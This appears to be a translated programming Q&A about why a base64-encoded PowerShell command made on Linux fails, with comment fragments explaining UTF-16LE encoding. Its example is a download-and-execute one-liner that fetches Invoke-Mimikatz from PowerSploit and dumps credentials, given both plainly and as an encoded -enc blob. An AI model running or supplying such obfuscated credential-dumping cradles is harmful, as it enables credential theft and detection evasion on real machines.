我希望在powershell中执行base64编码的命令。例如,我从这个github仓库中取了一个命令:https://gist.github.com/gfoss/ca6aa37f97fd400ff14f。运行mimikatz命令:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
如果我在 PowerShell 提示符中直接运行它,它会正常工作。检查 Base64 编码的版本,我发现它也能正常工作:
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
但是,我不确定这个字符串的编码方式。如果我在Linux中尝试对其进行编码,我会得到一个不同的字符串(我只是更改了引号以防止bash解释$):
echo -e 'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/Powe
rSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m' | openssl enc -base64 -A
SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vUG93ZXJTaGVsbE1hZmlhL1Bvd2VyU3Bsb2l0L21hc3Rlci9FeGZpbHRyYXRpb24vSW52b2tlLU1pbWlrYXR6LnBzMSIpOyAkbSA9IEludm9rZS1NaW1pa2F0eiAtRHVtcENyZWRzOyAkbQo=
当我尝试在powershell中使用-enc运行此编码时,出现错误。
我应该使用哪种编码方式使字符串与powershell完全兼容?
printf%s'...' | iconv -t UTF-16LE | base64 -w 0
。 - mklement0echo
以防止跨不同shell的行为差异和以-
开头的字符串出现问题。最后,echo
会附加一个换行符,虽然在这种情况下无关紧要,但在其他情况下可能会有影响。 - mklement0bash
、ksh
和zsh
(但不包括仅使用POSIX功能的shell,如dash
)中最简单的解决方法是使用[here-string](https://tiswww.case.edu/php/chet/bash/bashref.html#Here-Strings):`iconv -f ASCII -t UTF-16LE <<<"Write-Host'wassup!'" - mklement0"
,例如<<<"iex ""Command Goes here"""
。 - Mathias R. Jessen